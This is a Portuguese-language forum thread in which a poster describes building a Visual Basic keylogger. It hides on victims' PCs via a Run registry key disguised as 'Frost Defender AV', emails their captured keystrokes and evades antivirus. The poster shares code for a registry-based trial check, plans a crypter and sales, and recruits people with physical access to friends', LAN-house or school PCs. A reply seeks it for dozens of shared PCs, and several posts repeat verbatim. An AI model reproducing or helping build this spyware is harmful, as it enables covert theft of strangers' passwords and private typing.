Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

[KeyLogger] Projeto Piloto

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    [KeyLogger] Projeto Piloto

    Ola a todos da comunidade GH,

    Curso faculdade de Ciencia da Computacao e atualmente trabalho em uma empresa de software (mais especifico com programacao de dados variaveis) aqui na minha cidade.

    Comecei recentemente um projeto piloto para um Keylogger... Como muitos ja devem ter percebido.. na internet se acha bastante keylogger, mas muitos deles sao detectaveis, ai vc tem que buscar por um crypter.. por um binder.. e assim vai indo, decidi fazer um por conta propria.. nao copiei nada da internet, aprendi a logica que envolve a captura do teclado e o armazenamento do mesmo.. o qual serve de body para o envio do email..
    o projeto que estou fazendo atualmente executa no background da sua maquina, fica auto executavel no HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run
    onde toda vez que o pc da vitima for ligado ele auto executa sem ela perceber..
    Tratei no meu codigo o evento do backspace, onde ele remove a ultima key digitada pelo usuario, trata tambem o efeito do ENTER e o mais dificil, o evento do Shift que proporciona varios caracteres diferentes sendo o mesmo Chr para o nao shift.. O envio de email soh eh feito quando tem retorno do ping no site mail.google.com.. se caso tiver manda o email e limpa todos os caracteres gravados, se nao ele nem manda email e continua gravando o que foi digitado..
    Porem estou tendo dificuldades com o Layout do teclado, estou desenvolvendo seguindo o layout do meu notebook, que eh o US-International Keyboard, nao tenho disponibilidade para testar em outros, o qual provavelmente muda o retorno da GetAsnycKeyState.. o qual me leva fazer uma proposta pro pessoal que estiver vendo esse topico..

    Proponho o seguinte, uma troca justa..
    A pessoa que tiver acesso fisoco a algum pc (amigo, lan house, biblioteca da escola), me envie um inbox seguindo o seguinte formulario
    -----------------------------------------------------------------------
    Layout do pc o qual vou executar o layout : Brazil ABNT
    Tempo para recebimento do email : 60 minutos
    Email para recebimento : meuemail@gmail.com
    -----------------------------------------------------------------------

    Recebendo esse inbox, montarei um executavel do keylogger privado e apenas para voce usar, o que torna ele indetectavel.. apenas peco a gentileza de nao testar ele no virustotal.com.. pode utilizar qualquer outro... mas o virustotal, apesar de eu possuir o source, eh um pe no saco para malware..
    e enviarei para o seu email junto com algumas explicacoes..

    Como eu disse, isso eh uma troca justa, voce vai ter um keylogger de codigo privado tornando-o assim menos detectavel, mas EM TROCA, desejo receber um feedback dos resultados, gostaria que vc fisesse uma analise dos logs e entrasse em contato com o email que esta recebendo os Logs, falando os erros que encontro, se nao esta funcionando, o que poderia melhorar e etc...

    Meu objetivo eh liberar esse executavel para testes, apos eu terminar o keylogger deixando ele redondinho, prevendo qualquer tipo de evento do teclado, comecarei no desenvolvimento de um crypter o qual achei na internet a logica que eh usado para o mesmo, tornando assim uma ferramenta privada que supre boa parte de muitos keyloggers famosos disponiveis na internet, e futuramente comercializa-lo..

    Sei que vai ter alguns falando.. MENTIRA ISSO.. ESSE CARA SOH QUER ENGANAR A GENTE...
    Ja fica aqui a minha resposta..
    - Nao posso fazer nada se vc pensa assim, estou a procura de voluntarios, se caso vc acha que sou 171 e estou tentando alguma coisa.. fazer o que... mas para quem nao for kid.. e quiser me ajudar e ser beneficiado tb com um projeto teste porem especifico para o seu caso.. mande um private com o formulario que eu citei a pouco.

    favor postar se caso tiver uma duvida e talz...
    Obrigado pela atencao
    Similar Threads

  • Font Size
    #2
    Bacana, dps de ter feito alguns testes e melhorado alguns bugs (nao mandar email pq o timeout do ping estava muito curto e dependendo da velocidade da pessoa digitando ele nao retornava conexao oO bizarro d+).. quero implementar o controle de TRIAL via web...

    tipo.. minha aplicaçao soh manda email pra pessoa quando a variavel result for TRUE.. e pra ela ser true ela recebe da seguinte funçao:

    Dim result As Boolean = HandleRegistry()

    Private Function HandleRegistry() As Boolean
    Dim firstRunDate As Date
    firstRunDate = My.Computer.Registry.CurrentUser.GetValue("SOFTWAR E\Microsoft\Windows\CurrentVersion\Run\Frost Defender AV")
    If firstRunDate = Nothing Then
    firstRunDate = Now
    My.Computer.Registry.CurrentUser.SetValue("SOFTWAR E\Microsoft\Windows\CurrentVersion\Run\Frost Defender AV", firstRunDate)
    ElseIf (Now - firstRunDate).Days > 30 Then
    Return False
    End If
    Return True
    End Function
    ou seja.. ela pega o return de que se passou 30 dias com o executavel no registro, ela vai retornar false e nao enviando o email com o que foi digitado pela vitima... porem queria controlar isso via web.. ou seja

    na minha aplicaçao web eu recebo o tanto de dias que esta faltando, a variavel firstRunDate, assim tendo o controle de quanto tempo akele determinado exe esta sendo executado, logico que eu vou identificar cada executavel por um ID, cada vez que ele for executado em uma maquina diferente (Environ$("computername")) ele gera um ID onde envia para o web service o nome da maquina da vitima juntamente com o dia que começou a rodar na primeira vez... assim posso controlar melhor..

    alguem tem uma ideia.. pode me indicar algum tutorial..

    qualquer coisa que faça comunicaçao de uma aplicaçao em visual basic com um web service..

    Obrigado

    Comment


    • Font Size
      #3
      Bacana, dps de ter feito alguns testes e melhorado alguns bugs (nao mandar email pq o timeout do ping estava muito curto e dependendo da velocidade da pessoa digitando ele nao retornava conexao oO bizarro d+).. quero implementar o controle de TRIAL via web...

      tipo.. minha aplicaçao soh manda email pra pessoa quando a variavel result for TRUE.. e pra ela ser true ela recebe da seguinte funçao:

      Dim result As Boolean = HandleRegistry()

      Private Function HandleRegistry() As Boolean
      Dim firstRunDate As Date
      firstRunDate = My.Computer.Registry.CurrentUser.GetValue("SOFTWAR E\Microsoft\Windows\CurrentVersion\Run\Frost Defender AV")
      If firstRunDate = Nothing Then
      firstRunDate = Now
      My.Computer.Registry.CurrentUser.SetValue("SOFTWAR E\Microsoft\Windows\CurrentVersion\Run\Frost Defender AV", firstRunDate)
      ElseIf (Now - firstRunDate).Days > 30 Then
      Return False
      End If
      Return True
      End Function
      ou seja.. ela pega o return de que se passou 30 dias com o executavel no registro, ela vai retornar false e nao enviando o email com o que foi digitado pela vitima... porem queria controlar isso via web.. ou seja

      na minha aplicaçao web eu recebo o tanto de dias que esta faltando, a variavel firstRunDate, assim tendo o controle de quanto tempo akele determinado exe esta sendo executado, logico que eu vou identificar cada executavel por um ID, cada vez que ele for executado em uma maquina diferente (Environ$("computername")) ele gera um ID onde envia para o web service o nome da maquina da vitima juntamente com o dia que começou a rodar na primeira vez... assim posso controlar melhor..

      alguem tem uma ideia.. pode me indicar algum tutorial..

      qualquer coisa que faça comunicaçao de uma aplicaçao em visual basic com um web service..

      Obrigado

      Comment


      • Font Size
        #4
        Se um dia decidir programar malwares em C ou C++, pode contar comigo.

        Comment


        • Font Size
          #5
          Quando quiser codar em c ou c++, to na aréa disposto!

          Comment


          • Font Size
            #6
            Qualquer coisa tamos ae se quiser programar algo em c ou c++!

            Comment


            • Font Size
              #7
              Hehe.. vlw cara..
              mas meu objetivo mesmo eh aprendizado..
              na facu estudei.. c++ / java / android / php..
              estou nessa de .net para conhecer mais..
              acho que soh vou precisar de C quando for fazer um crypter.. mas pra isso preciso estudar a logistica em volta da criptografia..

              agradeço desde jah

              Obs.: ja consegui passar atraves de POST para a minha pagina em asp... agora vou começar o processo de recolher essa informaçao e gravar no BD... ta ficando da hora o KL kkkk

              Comment


              • Font Size
                #8
                Hehe.. vlw cara..
                mas meu objetivo mesmo eh aprendizado..
                na facu estudei.. c++ / java / android / php..
                estou nessa de .net para conhecer mais..
                acho que soh vou precisar de C quando for fazer um crypter.. mas pra isso preciso estudar a logistica em volta da criptografia..

                agradeço desde jah

                Obs.: ja consegui passar atraves de POST para a minha pagina em asp... agora vou começar o processo de recolher essa informaçao e gravar no BD... ta ficando da hora o KL kkkk

                Comment


                • Font Size
                  #9
                  Me adiciona no skype: riok0@live.com

                  Comment


                  • Font Size
                    #10
                    Oi MasterOrc, se quiser ajuda para codar o kl pode contar comigo me manda um MP.

                    Valeu

                    Comment


                    • Font Size
                      #11
                      Oi MasterOrc, se quiser ajuda para codar o kl pode contar comigo me manda um MP.

                      Valeu

                      Comment


                      • Font Size
                        #12
                        Tenho interesse

                        Olá, podemos se ajudar..
                        Tenho acesso a dezenas de PCs de alta qualidade utilizados por muita gente.
                        Preciso de um keylogger confiável e de qualidade URGENTE!

                        A quantas anda o projeto?

                        Abraços.

                        Comment


                        • Font Size
                          #13
                          TylerDurdenBrasil
                          vc tem skype?
                          se vc ou alguem quiser me add
                          minha conta do skype eh linkada com a do facebook.. entao pra me add acho q tem que procurar assim

                          facebook:l_n_borges

                          Comment

                          X
                          Working...
                          X